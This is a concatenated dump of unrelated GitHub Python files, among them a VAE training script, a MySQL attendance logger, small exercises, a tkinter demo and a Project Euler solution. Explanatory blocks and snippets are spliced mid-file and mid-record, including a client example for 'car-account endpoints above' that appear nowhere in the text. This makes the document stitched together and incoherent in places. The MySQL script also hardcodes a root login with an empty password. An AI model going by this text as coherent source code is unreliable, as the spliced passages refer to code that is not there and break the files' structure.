and\ninterpolate between various reconstructions.\n\nAt the end there is a method called 'journey' which extends on the idea of interpolating between 2 chosen models\nand chooses the models automatically on repeat to create cool interpolation animations.\n'''\n#\n\n#%% Imports\nimport numpy as np\nimport os\nfrom shutil import copyfile\nimport subprocess\nfrom sys import getsizeof, stdout\nfrom scipy import spatial\n\nimport time\nimport json\nimport pandas as pd\nimport random\nimport inspect\n\nimport pickle\nfrom tqdm import tqdm\nimport glob\n\nimport cvae as cv\nimport utils as ut\nimport logger\nimport configs as cf\n\nimport tensorflow as tf\n\nAUTOTUNE = 
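A quick way to exercise the `car-account` endpoints above from a client, assuming the Flask app runs on the default development address (URL and IDs here are illustrative):

```python
import requests

BASE = "http://localhost:5000"  # assumed dev-server address

# Field names match what post_car_account() reads from the JSON body.
r = requests.post(f"{BASE}/car-account",
                  json={"car_id": 1, "policeman_id": 2})
print(r.json())  # {'message': 'Success'}

print(requests.get(f"{BASE}/car-account").json())    # list all records
print(requests.get(f"{BASE}/car-account/1").json())  # fetch one by id
```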
tf.data.experimental.AUTOTUNE\n\nJUPYTER_NOTEBOOK = True\n\n# if JUPYTER_NOTEBOOK:\n# %reload_ext autoreload\n# %autoreload 2\n\n#%% Setup\n#######\ncf_img_size = cf.IMG_SIZE\ncf_latent_dim = cf.LATENT_DIM\ncf_batch_size = cf.BATCH_SIZE #32\ncf_learning_rate = cf.IMGRUN_LR #4e-4\ncf_limits = [cf_img_size, cf_img_size]\n#( *-*) ( *-*)>⌐■-■ ( ⌐■-■)\n#\ncf_kl_weight = cf.KL_WEIGHT\ncf_num_epochs = cf.N_IMGRUN_EPOCH\n#dfmeta = ut.read_meta()\ncf_val_frac = cf.VALIDATION_FRAC\n#%% are we GPU-ed?\ntf.config.experimental.list_physical_devices('GPU') \n\n\n#%% Define Training methods\n\n\ndef step_model(epochs, display_interval=-1, save_interval=10, test_interval=10,current_losses=([],[])) :\n \"\"\"\n custom training loops to enable dumping images of the progress\n \"\"\"\n\n model.training=False\n elbo_test,elbo_train = current_losses\n if len(elbo_test)>0:\n print(f\"test: n={len(elbo_test)}, last={elbo_test[-1]}\")\n print(f\"train: n={len(elbo_train)}, last={elbo_train[-1]}\")\n\n for epoch in range(1, epochs + 1):\n start_time = time.time()\n losses = []\n batch_index = 1\n\n # DO THE AUGMENTATION HERE...\n for train_x, label in train_dataset :\n neg_ll, kl_div = model.get_test_loss_parts(train_x)\n \n loss_batch = neg_ll+kl_div\n\n #neg_elbo = tf.math.reduce_mean(self.kl_weight *\n\n\n losses.append(loss_batch)\n stdout.write(\"\\r[{:3d}/{:3d}] \".format(batch_index, total_train_batchs))\n stdout.flush() \n\n batch_index = batch_index + 1\n\n ## TRAIN LOSS\n elbo = np.mean(losses)\n print(f'Epoch: {lg.total_epochs} Train loss: {float(elbo):.1f} Epoch Time: {float(time.time()-start_time):.2f}')\n lg.log_metric(elbo, 'train loss',test=False)\n elbo_train.append(elbo)\n\n if ((display_interval > 0) & (epoch % display_interval == 0)) :\n if epoch == 1:\n ut.show_reconstruct(model, test_samples, title=lg.total_epochs, index=sample_index, show_original=True, save_fig=True, limits=cf_limits) \n else:\n ut.show_reconstruct(model, test_samples, title=lg.total_epochs, index=sample_index, show_original=False, save_fig=True, limits=cf_limits)\n\n ## TEST LOSSin chekmakedirs\n test_losses = []\n for test_x, test_label in test_dataset: # (dataset.take(batches).shuffle(100) if batches > 0 else dataset.shuffle(100)) :\n #test_x = tf.cast(test_x, dtype=tf.float32) #might not need this\n test_cost_batch = model.compute_test_loss(test_x) # this should turn off the dropout...\n test_losses.append(test_cost_batch)\n\n test_loss = np.mean(test_losses)\n print(f' TEST LOSS : {test_loss:.1f} for epoch: {lg.total_epochs}')\n lg.log_metric(test_loss, 'test loss',test=True)\n elbo_test.append(test_loss)\n\n ## SAVE\n if epoch % save_interval == 0:\n lg.save_checkpoint()\n\n lg.increment_epoch()\n if (ut.check_stop_signal(dir_path=cf.IMGRUN_DIR)) :\n print(f\"stoping at epoch = {epoch}\")\n break\n else:\n print(f\"executed {epoch} epochs\")\n \n out_losses = (elbo_train,elbo_test)\n return epoch, out_losses #(loss_batch2,loss_batchN)\n\n\n\n\n\ndef train_model(epochs, display_interval=-1, save_interval=10, test_interval=10,current_losses=([],[])) :\n \"\"\"\n custom training loops to enable dumping images of the progress\n \"\"\"\n print('\\n\\nStarting training...\\n')\n model.training=True\n elbo_train,elbo_test = current_losses\n if len(elbo_test)>0:\n print(f\"test: n={len(elbo_test)}, last={elbo_test[-1]}\")\n print(f\"train: n={len(elbo_train)}, last={elbo_train[-1]}\")\n\n for epoch in range(1, epochs + 1):\n start_time = time.time()\n losses = []\n batch_index = 1\n\n # DO THE AUGMENTATION HERE...\n for 
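Both custom loops here drive the model through `model.trainStep`, which lives in `cvae.py` and is not shown. For orientation, a typical TensorFlow 2 train step for a VAE-style model looks like the following (a generic sketch under that assumption, not the project's actual code):

```python
import tensorflow as tf

@tf.function
def train_step(model, optimizer, x):
    # One gradient update on a batch; the loss would combine the
    # reconstruction term and the KL term, e.g. neg_ll + kl_weight * kl_div.
    with tf.GradientTape() as tape:
        loss = model.compute_loss(x)
    grads = tape.gradient(loss, model.trainable_variables)
    optimizer.apply_gradients(zip(grads, model.trainable_variables))
    return loss
```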
train_x, _ in train_dataset :\n #for train_x, label in train_dataset :\n #train_x = tf.cast(train_x, dtype=tf.float32)\n loss_batch = model.trainStep(train_x)\n losses.append(loss_batch)\n stdout.write(\"\\r[{:3d}/{:3d}] \".format(batch_index, total_train_batchs))\n stdout.flush() \n\n batch_index = batch_index + 1\n\n ## TRAIN LOSS\n elbo = np.mean(losses)\n print(f'Epoch: {lg.total_epochs} Train loss: {float(elbo):.1f} Epoch Time: {float(time.time()-start_time):.2f}')\n lg.log_metric(elbo, 'train loss',test=False)\n elbo_train.append(elbo)\n\n if ((display_interval > 0) & (epoch % display_interval == 0)) :\n if epoch == 1:\n ut.show_reconstruct(model, test_samples, title=lg.total_epochs, index=sample_index, show_original=True, save_fig=True, limits=cf_limits) \n else:\n ut.show_reconstruct(model, test_samples, title=lg.total_epochs, index=sample_index, show_original=False, save_fig=True, limits=cf_limits)\n\n ## TEST LOSSin chekmakedirs\n if epoch % test_interval == 0:\n test_losses = []\n for test_x, test_label in test_dataset: # (dataset.take(batches).shuffle(100) if batches > 0 else dataset.shuffle(100)) :\n #test_x = tf.cast(test_x, dtype=tf.float32) #might not need this\n test_cost_batch = model.compute_test_loss(test_x) # this should turn off the dropout...\n test_losses.append(test_cost_batch)\n\n test_loss = np.mean(test_losses)\n print(f' TEST LOSS : {test_loss:.1f} for epoch: {lg.total_epochs}')\n lg.log_metric(test_loss, 'test loss',test=True)\n elbo_test.append(test_loss)\n\n ## SAVE\n if epoch % save_interval == 0:\n lg.save_checkpoint()\n\n lg.increment_epoch()\n if (ut.check_stop_signal(dir_path=cf.IMGRUN_DIR)) :\n print(f\"stoping at epoch = {epoch}\")\n break\n else:\n print(f\"executed {epoch} epochs\")\n \n out_losses = (elbo_train,elbo_test)\n return epoch, out_losses #(loss_batch2,loss_batchN)\n\n\n\n#%% #################################################\n##\n## LOAD/PREP data\n## - l if we've already been through this for the current database we'll load... 
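`ut.check_stop_signal(dir_path=cf.IMGRUN_DIR)` lets a long run exit cleanly between epochs. The helper is project code and not shown; a plausible stand-in (the sentinel file name is assumed) is just:

```python
import os

def check_stop_signal(dir_path="."):
    # Training stops gracefully once a sentinel file appears in dir_path,
    # so a multi-hour run can be interrupted without killing the process.
    return os.path.exists(os.path.join(dir_path, "stop"))

print(check_stop_signal())  # False until a file named "stop" is created
```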
otherwise process.\n#####################################################\n\n\n\ndata_from_scratch = not ut.check_for_datafiles(cf.DATA_DIR,['train_data.npy','val_data.npy','all_data.npy'])\n#data_from_scratch = True\nrandom.seed(488)\ntf.random.set_seed(488)\n\nif data_from_scratch:\n #create\n files = glob.glob(os.path.join(cf.IMAGE_FILEPATH, \"*/img/*\"))\n files = np.asarray(files)\n train_data, val_data, all_data = ut.split_shuffle_data(files,cf_val_frac)\n # Save base train data to file \n np.save(os.path.join(cf.DATA_DIR, 'train_data.npy'), train_data, allow_pickle=True)\n np.save(os.path.join(cf.DATA_DIR, 'val_data.npy'), val_data, allow_pickle=True)\n np.save(os.path.join(cf.DATA_DIR, 'all_data.npy'), all_data, allow_pickle=True)\nelse:\n #load\n print(f\"loading train/validate data from {cf.DATA_DIR}\")\n train_data = np.load(os.path.join(cf.DATA_DIR, 'train_data.npy'), allow_pickle=True)\n val_data = np.load(os.path.join(cf.DATA_DIR, 'val_data.npy'), allow_pickle=True)\n all_data = np.load(os.path.join(cf.DATA_DIR, 'all_data.npy'), allow_pickle=True)\n\n\n#%% #################################################\n##\n## Set up the model \n## - load current state or\n## - train from scratch\n#####################################################\n\nmodel = cv.CVAE(cf_latent_dim, cf_img_size, learning_rate=cf_learning_rate, kl_weight=cf_kl_weight, training=True)\n### instance of model used in GOAT blog\n#model = cv.CVAE_EF(cf_latent_dim, cf_img_size, cf_learning_rate, training=True)\n\nmodel.print_model_summary()\nmodel.print_model_IO()\n\nif JUPYTER_NOTEBOOK:\n tf.keras.utils.plot_model(model.enc_model, show_shapes=True, show_layer_names=True)\n tf.keras.utils.plot_model(model.gen_model, show_shapes=True, show_layer_names=True)\n\n\n#%% Setup logger info\ntrain_from_scratch = ( cf.CURR_IMGRUN_ID is None )\n\nif train_from_scratch:\n lg = logger.logger(trainMode=True, txtMode=False)\n lg.setup_checkpoint(encoder=model.enc_model, generator=model.gen_model, opt=model.optimizer) # sets up the writer\n #lg.restore_checkpoint() \n lg.check_make_dirs() # makes all the direcotries\n # copy to the current run train data to file\n np.save(os.path.join(lg.saved_data, 'train_data.npy'), train_data, allow_pickle=True)\n np.save(os.path.join(lg.saved_data, 'val_data.npy'), val_data, allow_pickle=True)\n np.save(os.path.join(lg.saved_data, 'all_data.npy'), all_data, allow_pickle=True)\n total_epochs = 0\n curr_losses = ([],[])\nelse:\n root_dir = os.path.join(cf.IMGRUN_DIR, cf.CURR_IMGRUN_ID)\n lg = logger.logger(root_dir=root_dir, trainMode=True, txtMode=False)\n lg.setup_checkpoint(encoder=model.enc_model, generator=model.gen_model, opt=model.optimizer) # sets up the writer\n lg.restore_checkpoint() # actuall reads in the weights...\n allfiles = os.listdir(lg.saved_data)\n print(f\"allfiles: {allfiles}\")\n total_epochs = [int(f.rstrip(\".pkl\").lstrip(\"losses_\")) for f in allfiles if f.startswith(\"losses_\")]\n total_epochs.sort(reverse=True)\n print(f\"total_epochs = {total_epochs[0]}\")\n total_epochs = total_epochs[0]\n curr_losses = ut.load_pickle(os.path.join(lg.saved_data, f\"losses_{total_epochs}.pkl\"))\n\n\n\n#%% # LOAD & PREPROCESS the from list of filessudo apt install gnome-tweak-tool\n# could simplify this by making another \"load_prep_batch_data(train_data,imagesize,augment=True,)\"\ntrain_dataset = ut.load_prep_and_batch_data(train_data, cf_img_size, cf_batch_size, augment=True)\ntest_dataset = ut.load_prep_and_batch_data( val_data, cf_img_size, cf_batch_size, 
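One pitfall in the epoch parsing above: `f.rstrip(".pkl").lstrip("losses_")` works only by luck. `str.lstrip`/`str.rstrip` take a *set of characters*, not a literal prefix or suffix, so they keep stripping any character from that set; the epoch digits survive only because digits are outside both sets. A safer sketch:

```python
f = "losses_120.pkl"

# Exact prefix/suffix removal, Python 3.9+:
epoch = int(f.removeprefix("losses_").removesuffix(".pkl"))
print(epoch)  # 120

# Pre-3.9 equivalent for the fixed "losses_<n>.pkl" layout:
print(int(f[len("losses_"):-len(".pkl")]))  # 120
```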
augment=False)\n\n# train_dataset = tf.data.Dataset.from_tensor_slices(train_data)\n# test_dataset = tf.data.Dataset.from_tensor_slices(val_data)\n# train_dataset = ut.load_and_prep_data(cf_img_size, train_dataset, augment=True)\n# test_dataset = ut.load_and_prep_data(cf_img_size, test_dataset, augment=False)\n# train_dataset = ut.batch_data(train_dataset)\n# test_dataset = ut.batch_data(test_dataset)\n\n#%% Load all data\n# get some samples\nfor train_samples, train_labels in train_dataset.take(1) : pass\nfor test_samples, test_labels in test_dataset.take(1) : pass\n\n# count number of batches... \ntotal_train_batchs = 0\nfor _ in train_dataset :\n total_train_batchs += 1\n\n# #%% Setup datasets\nsample_index = 1\n\n\n#%% lets pick apart our loss/cost\n# we already have our samples\n# train_samples, train_labels in train_dataset.take(1) : pass\n# test_samples, test_labels in test_dataset.take(1) : pass\n\n\n#%%\n\n \n\n\n\n\n\n#%% Training & Validation data save?\n# do we want to save the image data for the training set... i.e. the augmented bytes?\ndump_image_data = False\nif dump_image_data:\n\n start_time = time.time()\n batch_index = 1\n imgs = []\n labels = []\n\n for train_x, label in train_dataset :\n #train_x = tf.cast(train_x, dtype=tf.float32)\n #imgs.append(np.moveaxis(train_x.numpy(),0,-1)) # put the \"batch\" at the end so we can stack\n imgs.append(train_x.numpy()) # put the \"batch\" at the end so we can stack\n labs = [l.numpy().decode() for l in label]# decode makes this a simple string??\n labels.extend(labs)\n stdout.write(\"\\r[{:3d}/{:3d}] \".format(batch_index, total_train_batchs))\n stdout.flush()\n batch_index = batch_index + 1\n\n trainimgs = np.concatenate(imgs,axis=0)\n trainlabs = labels # np.stack(labels)\n False\n print('Epoch Time: {:.2f}'.format( float(time.time() - start_time)))\n\n ut.dump_pickle(os.path.join(lg.saved_data,\"train_agumented.pkl\"), (trainimgs,trainlabs) )\n\n # validation data save \n batch_index = 1\n imgs = []\n labels = []\n for test_x, label in test_dataset :\n imgs.append(train_x.numpy()) # put the \"batch\" at the end so we can stack\n labs = [l.numpy().decode() for l in label] # decode makes this a simple string??\n labels.extend(labs)\n\n stdout.write(\"\\r[{:3d}/{:3d}] \".format(batch_index, 16))\n stdout.flush()\n batch_index = batch_index + 1\n\n flatten = lambda l: [item for sublist in l for item in sublist]\n\n testlabs = labels # np.stack(labels)\n testimgs = np.concatenate(imgs,axis=0)\n print('Epoch Time: {:.2f}'.format( float(time.time() - start_time)))\n\n ut.dump_pickle(os.path.join(lg.saved_data,\"test.pkl\"), (testimgs,testlabs) )\n\n\n#%% \n# #################################################\n##\n## log the run and TRAIN!!\n## - train from scratch OR \n## - start where we left off\n##\n#####################################################\n\ncf_root_dir = lg.root_dir #make sure we log this\n# log Config...\nlg.write_config(locals(), [cv.CVAE, cv.CVAE.__init__])\nlg.update_plot_dir()\n#tf.config.experimental.list_physical_devices('GPU') \n\n\n\n\n#%% \nn_epochs = cf_num_epochs\nepoch_n, curr_losses = train_model(n_epochs, display_interval=5, save_interval=20, test_interval=5,current_losses=curr_losses)\n#epoch_n,elbo_train,elbo_test = trainModel(n_epochs, display_interval=5, save_interval=5, test_interval=5)\ntotal_epochs += epoch_n\nif lg.total_epochs == total_epochs:\n print(f\"sanity epoch={total_epochs}\")\nelse:\n lg.reset(total_epochs=total_epochs)\nmodel.save_model(lg.root_dir, lg.total_epochs 
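Counting `total_train_batchs` above by iterating the dataset forces a full pass through the input pipeline. When the dataset size is statically known, `tf.data` can report it directly; a small sketch:

```python
import tensorflow as tf

ds = tf.data.Dataset.range(100).batch(32)

# Iterating just to count batches reads the whole pipeline once;
# cardinality() answers directly when the size is statically known.
print(int(tf.data.experimental.cardinality(ds)))  # 4
```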
)\n\nut.dump_pickle(os.path.join(lg.saved_data, f\"losses_{total_epochs}.pkl\"),curr_losses)\n\n\n\nfor test_samples, test_labels in test_dataset.take(1) : pass\nfor train_samples, train_labels in train_dataset.take(1) : pass\n\n#%% \nsample_index = 1\n\nfor sample_index in range(10):\n title_text = f\"trained n={sample_index}\"\n ut.show_reconstruct(model, train_samples, title=title_text, index=sample_index, show_original=True, save_fig=True, limits=cf_limits)\n\nfor sample_index in range(10):\n title_text = f\"tested n={sample_index}\"\n ut.show_reconstruct(model, test_samples, title=title_text, index=sample_index, show_original=True, save_fig=True, limits=cf_limits)\n\n###########################\n############################\n#\n# Now make some easy access databases...\n#\n############################\n###########################\n#%% \n\n# ut.make_gif_from_dir(gif_in_dir, name):\n\n# model.save_model(lg.root_dir, 138)\n# #%% \n\n# model.load_model(lg.root_dir,669)\n# # Need to make methods to extract the pictures \n\n#%% Run model on all data to get latent vects and loss. Used for streamlit app and other places.\n#preds,losses = ut.dumpReconstruct( model, train_dataset, test_dataset )\nds = ut.load_and_dump(cf_img_size, lg.img_in_dir)\n#or _samples, _labels in ds.take(1) : pass\n# remake this to simply go through all the data and calculate the embedding and loss... new functions probably...\n#%%count our n\nn_samples = 0\nfor _ in ds :\n n_samples += 1\n#%% dump the vectors to a dictionary\n\nsnk2loss = {}\nsnk2vec = {}\nfor sample, label in tqdm(ds, \n unit_scale=True, \n desc=\"Saving shape 2 vec: \", \n unit=\" encodes\", \n total=n_samples ) :\n #sample = tf.cast(sample, dtype=tf.float32)\n key = label.numpy() # maybe should have changed this to a string... 
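`ut.dump_pickle` / `ut.load_pickle` used above for the loss history are project helpers; plausible implementations, matching how they are called here, are thin wrappers over the standard `pickle` module:

```python
import pickle

def dump_pickle(path, obj):
    # Signature assumed from the call sites above: path first, object second.
    with open(path, "wb") as f:
        pickle.dump(obj, f)

def load_pickle(path):
    with open(path, "rb") as f:
        return pickle.load(f)

dump_pickle("/tmp/losses_1.pkl", ([1.2, 0.9], [1.3, 1.0]))
print(load_pickle("/tmp/losses_1.pkl"))
```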
but byte is good...\n snk2vec[key] = model.encode(sample[None,...], reparam=True).numpy()[0]\n snk2loss[key] = model.compute_loss(sample[None,...]).numpy()\n\nut.dump_pickle(os.path.join(lg.root_dir,\"snk2vec.pkl\"), snk2vec)\nut.dump_pickle(os.path.join(lg.root_dir,\"snk2loss.pkl\"), snk2loss)\n\n\n\n\n#################\n#################\n","repo_name":"ergonyc/SneakerGen","sub_path":"beta-vae/vae.py","file_name":"vae.py","file_ext":"py","file_size_in_byte":16521,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"320310893","text":"import mysql.connector\r\nimport csv\r\nfrom datetime import datetime \r\n\r\nmydb = mysql.connector.connect(\r\n host = \"localhost\",\r\n user = \"root\",\r\n password = \"\",\r\n database = \"absensi\",\r\n autocommit=True\r\n)\r\n\r\nmycursor = mydb.cursor()\r\n\r\nwith open('id-names.csv', 'r') as file:\r\n reader = csv.reader(file)\r\n next(reader)\r\n for row in reader:\r\n name = \"Raffa\"\r\n waktu = datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\r\n print(name)\r\n print(waktu)\r\n query = \"INSERT INTO absen (name, waktu) VALUES (%s, %s)\"\r\n values = (name, waktu)\r\n mycursor.execute(query, values)\r\n\r\nmydb.commit()\r\nmydb.close()\r\n\r\n\r\n","repo_name":"NekoMeong/Absensi","sub_path":"penyambung.py","file_name":"penyambung.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"71431670297","text":"from random import randint\nimport numpy as np\nimport objects\n\nclass horizontalbeams:\n def __init__(self,board):\n self.__character=\"-\"\n self.__x=randint(2,29)\n self.__y=randint(10,1300)\n self._placehorizontalbeam(board)\n\n def _placehorizontalbeam(self,board):\n flag=0\n for j in range(self.__y,self.__y+4):\n if board._matrix[self.__x][j]==\"$\" or board._matrix[self.__x][j]==\"|\":\n flag=1\n arr3=np.empty([1,4],dtype=object)\n if flag==0:\n arr3=objects.horizontal_beam\n board._matrix[self.__x:self.__x+1,self.__y:self.__y+4]=arr3","repo_name":"damasravani19/Jet-pack-joyride","sub_path":"horizontalbeams.py","file_name":"horizontalbeams.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"32185854400","text":"# 把一个字符串转换为Unicode码位的列表\nsymbols = \"@#$%^&\"\ncodes = []\n\nfor symbol in symbols:\n # ord返回一个单字��字符串的Unicode代码点。\n codes.append(ord(symbol))\n\nprint(codes)\n\n# 使用列表推导式\ncodes_2 = [ord(symbol) for symbol in symbols]\nprint(codes_2)\n\n# 使用filter和map组合\nsymbols_2 = \"$¥%*%@!#\"\nbeyond_ascii = list(filter(lambda c: c > 127, map(ord, symbols_2)))\nprint(beyond_ascii)\n","repo_name":"mgw2168/fluent_python","sub_path":"chapter02/01-listcomps.py","file_name":"01-listcomps.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"42533415528","text":"opcao = ' '\ncount = 0\nsoma = 0\nmaior = 0\nmenor = 0\nwhile opcao not in 'Nn':\n num = int(input('Digite um número: '))\n if count == 0:\n maior = num\n menor = num\n if maior < num:\n maior = num\n if menor > num:\n menor = num\n soma += num\n count += 1\n opcao = input('Deseja continuar [S/N]? ')\n\nmedia = soma / count\nprint('Você digitou {} números. 
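On the listcomps example above (its Chinese comments note that it converts a string to a list of Unicode code points, first with a loop, then with a comprehension, then with `filter`/`map`): the last two spellings are equivalent, and the comprehension is usually considered more readable. A check:

```python
symbols = "$¥%*%@!#"

# filter + map spelling, as in the example above...
beyond_ascii = list(filter(lambda c: c > 127, map(ord, symbols)))

# ...and the equivalent comprehension:
beyond_ascii_2 = [ord(s) for s in symbols if ord(s) > 127]

assert beyond_ascii == beyond_ascii_2
print(beyond_ascii)  # [165]: only '¥' lies beyond the 7-bit ASCII range
```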
A média dos valores digitados foi {}, '\n 'o menor valor {} e o maior valor {}.'.format(count, media, menor, maior))\n","repo_name":"fabriciolelis/python_studying","sub_path":"Curso em Video/ex065.py","file_name":"ex065.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"38810673487","text":"from sympy import symbols, Piecewise, integrate, oo, limit, pprint\nfrom sympy.plotting import plot\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport soundfile as sf\nfrom scipy.signal import fftconvolve\nfrom scipy.fftpack import fft, ifft\nfrom ejercicio_1 import funcion_a_trozos, grafico_funcion, energia_señal, potencia_señal\nfrom ejercicio_2 import aleatorios\nfrom ejercicio_3 import promedio_señal\nfrom ejercicio_4 import carga_lectura_wav, convolucion\n\ndef main():\n print(\"En el presente trabajo, presentamos las respuestas de los ejercicios solicitados:\\n\")\n print(f\"Ejercicio 1:\\n{'-'*30}\")\n \n x, T = symbols(\"x T\")\n\n funcion = funcion_a_trozos(x)\n grafico_funcion(funcion)\n energia = energia_señal(funcion, x)\n potencia = potencia_señal(funcion, x, T)\n print(\"La señal está caracterizada por: \")\n pprint(funcion)\n print(\n f\"\\nLa misma tiene una energía de valor {energia}\\nY una potencia igual a {potencia}\"\n )\n\n print('-'*30)\n\n print(f\"Ejercicio 2:\\n{'-'*30}\")\n print(\"Se mostrará un gráfico correspondiente a la consigna solicitada:\\n\")\n aleatorios(0, 10, 30)\n print('-'*30)\n\n print(f\"Ejercicio 3:\\n{'-'*30}\")\n nombre_archivo_ej3 = input(\"Ingrese el nombre del archivo de audio seguido de .wav para graficar su promedio: \")\n promedio_señal(nombre_archivo_ej3)\n print('-'*30)\n\n print(f\"Ejercicio 4:\\n{'-'*30}\")\n nombre_archivo_ej4_1 = input(\"Ingrese el nombre del primer archivo de audio seguido de .wav para convolucionar (o su ruta de acceso): \")\n nombre_archivo_ej4_2 = input(\"Ingrese el nombre del segundo archivo de audio seguido de .wav para convolucionar (o su ruta de acceso): \")\n data_1, fs_1 = carga_lectura_wav(nombre_archivo_ej4_1)\n data_2, fs_2 = carga_lectura_wav(nombre_archivo_ej4_2)\n convolucion_audios = convolucion(data_1, data_2)\n print('-'*30)\n\nif __name__ == '__main__':\n main()","repo_name":"maxiyommi/coding-challenge","sub_path":"benjamin_sardini/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1921,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"19218999922","text":"from tkinter import *\n\nwindow = Tk()\nwindow.title(\"My first GUI program\")\nwindow.minsize(width=500, height=300)\n\nmy_label = Label(text=\"I am a Label\", font=(\"Arial\", 24, \"bold\"))\n#pack() puts it in the centre of the screen\nmy_label.grid(column=0, row=0)\n\n#button\ndef button_clicked():\n my_label.config(text=input.get())\n\n\nbutton = Button(text=\"Click me\", command=button_clicked)\nbutton.grid(column=1, row=1)\n\n# Entry\ninput = Entry(width=10)\ninput.grid(column=3, row=2)\n\nnew_button = Button(text=\"click me\")\nnew_button.grid(column=2, row=0)\n\n\n\nwindow.mainloop()","repo_name":"adachoinw/python","sub_path":"day27/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"26494309432","text":"'''\nThe decimal number, 585 = 10010010012 (binary), is palindromic in both bases.\n\nFind the sum of all numbers, less than one 
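The signal-analysis script above calls `energia_señal(funcion, x)`, imported from `ejercicio_1` and not shown. The standard definition it presumably implements is the signal energy E = ∫|x(t)|² dt; a self-contained sympy sketch with an illustrative rectangular pulse (not the actual signal from `ejercicio_1`):

```python
from sympy import Piecewise, integrate, oo, symbols

t = symbols("t", real=True)
# Illustrative finite-energy signal: a unit pulse on [0, 2].
x_t = Piecewise((1, (t >= 0) & (t <= 2)), (0, True))

# Signal energy: the integral of |x(t)|**2 over the whole real line.
energy = integrate(x_t**2, (t, -oo, oo))
print(energy)  # 2
```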
million, which are palindromic in base 10 and base 2.\n\n(Please note that the palindromic number, in either base, may not include leading zeros.)\n'''\n\nimport time\n\ndef is_palin(n):\n return str(n) == str(n)[::-1]\n\n#driver code\nstart_time = time.time()\n\npalindromes = []\n\nfor i in range(1000000):\n if is_palin(i):\n if is_palin(bin(i)[2:]):\n palindromes.append(i)\n\nprint(sum(palindromes))\nprint('Runtime: {}'.format(time.time() - start_time))\n","repo_name":"JVorous/ProjectEuler","sub_path":"problem36.py","file_name":"problem36.py","file_ext":"py","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"40699884629","text":"#\r\n# Skeleton file for the Python \"Bob\" exercise.\r\n#\r\ndef hey(what):\r\n alphas=caps=0\r\n if what.strip()=='':\r\n return 'Fine. Be that way!'\r\n for i in range(len(what)):\r\n if what[i].isalpha(): alphas+=1\r\n if what[i].isupper(): caps+=1\r\n if alphas==caps and alphas!=0: return 'Whoa, chill out!'\r\n if what.strip()[-1]=='?':\r\n return 'Sure.'\r\n else: return 'Whatever.'\r\n","repo_name":"itsolutionscorp/AutoStyle-Clustering","sub_path":"all_data/exercism_data/python/bob/9239173283e942f0abf5adc46080ceb8.py","file_name":"9239173283e942f0abf5adc46080ceb8.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"68"} +{"seq_id":"35524709303","text":"class Plant:\n def __init__(self, name):\n self._name = name\n\n def get_name(self):\n return self._name\n\n def set_name(self, new_name):\n self._name = new_name\n return\n\n\nobj = Plant(\"object\")\nprint(obj.get_name())\n\n\nclass Wood(Plant):\n def __init__(self, name, color):\n super().__init__(name)\n self.color = color\n\n\noak = Wood(\"oak\", \"brown\")\nprint(oak.get_name())\nprint(oak.color)\n\n\nclass Furniture:\n def __init__(self, furniture_name, name, color):\n self.furniture_name = furniture_name\n self.wood = Wood(name, color)\n\n\nfurniture = Furniture(\"bench\", \"pine\", \"light brown\")\nprint(furniture.furniture_name)\nprint(furniture.wood.get_name())\nprint(furniture.wood.color)\n\n\nclass ClassB:\n class_variable = 2\n\n def __init__(self, object_variable):\n self.object_variable = object_variable\n\n @classmethod\n def class_method(cls):\n cls.class_variable = 3\n return\n\n def object_method(self):\n self.object_variable = \"longer_string\"\n return\n\n\nobj1 = ClassB(\"string\")\nobj2 = ClassB(\"also a string\")\n\nprint(obj1.object_variable)\nprint(obj2.object_variable)\nobj1.object_method()\nprint(obj1.object_variable)\nprint(obj2.object_variable)\n\nprint(obj1.class_variable)\nprint(obj2.class_variable)\nClassB.class_method()\nprint(obj1.class_variable)\nprint(obj2.class_variable)\n","repo_name":"ivanyang06/CsTest","sub_path":"code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":1367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"41004763846","text":"import random\n\nnum = random.randint(0,100)\nwhile True:\n try:\n guess = int(input('enter 1-100\\n'))\n except ValueError as e:\n print(\"error\",e)\n continue\n if guess > num:\n print('猜大了')\n elif guess < num:\n print('猜小了')\n else:\n print('ok')\n break","repo_name":"mixinan/first-python-project","sub_path":"guess.py","file_name":"guess.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} 
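A small optimization for the double-base palindrome search above: a binary palindrome may not have leading zeros, so it must start with 1 and therefore also end with 1, meaning only odd numbers can qualify. Stepping by 2 halves the loop and reproduces the same total:

```python
def is_palin(n):
    s = str(n)
    return s == s[::-1]

# Only odd candidates: an even number ends in binary 0, which would
# force a leading zero in any binary palindrome.
total = sum(i for i in range(1, 1_000_000, 2)
            if is_palin(i) and is_palin(bin(i)[2:]))
print(total)  # 872187
```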
